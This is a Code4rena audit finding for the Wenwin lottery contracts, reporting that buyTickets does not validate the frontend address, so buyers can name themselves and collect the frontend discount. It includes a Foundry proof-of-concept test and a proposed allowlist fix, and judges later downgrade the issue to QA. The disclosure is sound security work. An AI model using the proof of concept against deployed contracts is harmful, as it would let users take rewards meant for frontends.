code-423n4 / 2023-03-wenwin-findings


User can always buy tickets at a discount #6

Closed code423n4 closed 1 year ago

code423n4 commented 1 year ago

Lines of code

https://github.com/code-423n4/2023-03-wenwin/blob/main/src/Lottery.sol#L110

Vulnerability details

Impact

There's no validation for the frontend address when calling buyTickets. This means any user can set themselves to be the frontend and get a FRONTEND_REWARD percent discount all the time when buying tickets.

Proof of Concept

// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

import "./LotteryTestBase.sol";
import "../src/Lottery.sol";
import "./TestToken.sol";
import "test/TestHelpers.sol";
// Needed for console.log below unless LotteryTestBase already imports forge-std/Test.sol.
import "forge-std/console.sol";

contract MoreLotteryTest is LotteryTestBase {
    address public constant OWNER = address(0x111);

    address public constant USER = address(123);

    // Buys a single ticket for `draw` and passes USER itself as the `frontend`
    // argument of buyTickets; nothing in Lottery rejects this.
    function buyTicketOnDiscount(uint128 draw, uint120 ticket, address referrer) internal returns (uint256 ticketId) {
        uint128[] memory drawIds = new uint128[](1);
        drawIds[0] = draw;
        uint120[] memory tickets = new uint120[](1);
        tickets[0] = ticket;

        uint256[] memory ticketIds = lottery.buyTickets(drawIds, tickets, USER, referrer);
        return ticketIds.length > 0 ? ticketIds[0] : 0;
    }

    function testBuyTicket() public {
        uint128 currentDraw = lottery.currentDraw();
        uint256 initialBalance = rewardToken.balanceOf(address(lottery));

        vm.startPrank(USER);
        rewardToken.mint(5 ether);
        rewardToken.approve(address(lottery), 10 ether);
        console.log(rewardToken.balanceOf(address(lottery)));
        // USER buys a ticket naming itself as the frontend, with no referrer.
        buyTicketOnDiscount(currentDraw, uint120(0x0F), address(0));
        // USER then claims the FRONTEND reward that accrued from its own purchase.
        lottery.claimRewards(LotteryRewardType.FRONTEND);
        console.log(rewardToken.balanceOf(address(lottery)));
        assertEq(rewardToken.balanceOf(address(lottery)), initialBalance + TICKET_PRICE);
    }

}

Tools Used

forge test

Recommended Mitigation Steps

Establish some kind of whitelist for valid frontends to avoid this problem.
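One way to implement the suggested whitelist, as an added illustration rather than Wenwin's own code: an owner-managed allowlist that buyTickets consults before crediting any frontend. The contract, function and event names (FrontendAllowlist, setFrontend, isFrontend, frontendDueTicketSales) are assumptions for this sketch, and treating address(0) as "no frontend" is likewise an assumption, not the project's documented behaviour.

```solidity
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

// Added example, not part of the Wenwin codebase. Names are hypothetical.
abstract contract FrontendAllowlist {
    address public immutable owner;
    mapping(address => bool) private allowed;

    event FrontendUpdated(address indexed frontend, bool allowed);

    error NotOwner();
    error FrontendNotAllowed(address frontend);

    constructor() {
        owner = msg.sender;
    }

    modifier onlyOwner() {
        if (msg.sender != owner) revert NotOwner();
        _;
    }

    // Only the owner can add or remove a frontend; the change is logged so
    // off-chain monitoring can alert on unexpected additions.
    function setFrontend(address frontend, bool isAllowed) external onlyOwner {
        allowed[frontend] = isAllowed;
        emit FrontendUpdated(frontend, isAllowed);
    }

    function isFrontend(address frontend) public view returns (bool) {
        return allowed[frontend];
    }

    // Assumption: address(0) means "no frontend" and earns no reward;
    // any other address must be on the allowlist, so a buyer cannot
    // simply name themselves and pocket FRONTEND_REWARD.
    modifier onlyAllowedFrontend(address frontend) {
        if (frontend != address(0) && !isFrontend(frontend)) revert FrontendNotAllowed(frontend);
        _;
    }
}

contract LotteryWithAllowlist is FrontendAllowlist {
    mapping(address => uint256) public frontendDueTicketSales; // hypothetical accounting

    // Same signature as the issue's buyTickets; the check runs before any credit.
    // Payment and ticket minting are not reproduced here.
    function buyTickets(uint128[] calldata, uint120[] calldata tickets, address frontend, address)
        external onlyAllowedFrontend(frontend)
    {
        if (frontend != address(0)) frontendDueTicketSales[frontend] += tickets.length;
    }
}
```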

c4-judge commented 1 year ago

thereksfour marked the issue as nullified

c4-judge commented 1 year ago

thereksfour marked the issue as not nullified

c4-judge commented 1 year ago

thereksfour marked the issue as duplicate of #483

c4-judge commented 1 year ago

thereksfour changed the severity to QA (Quality Assurance)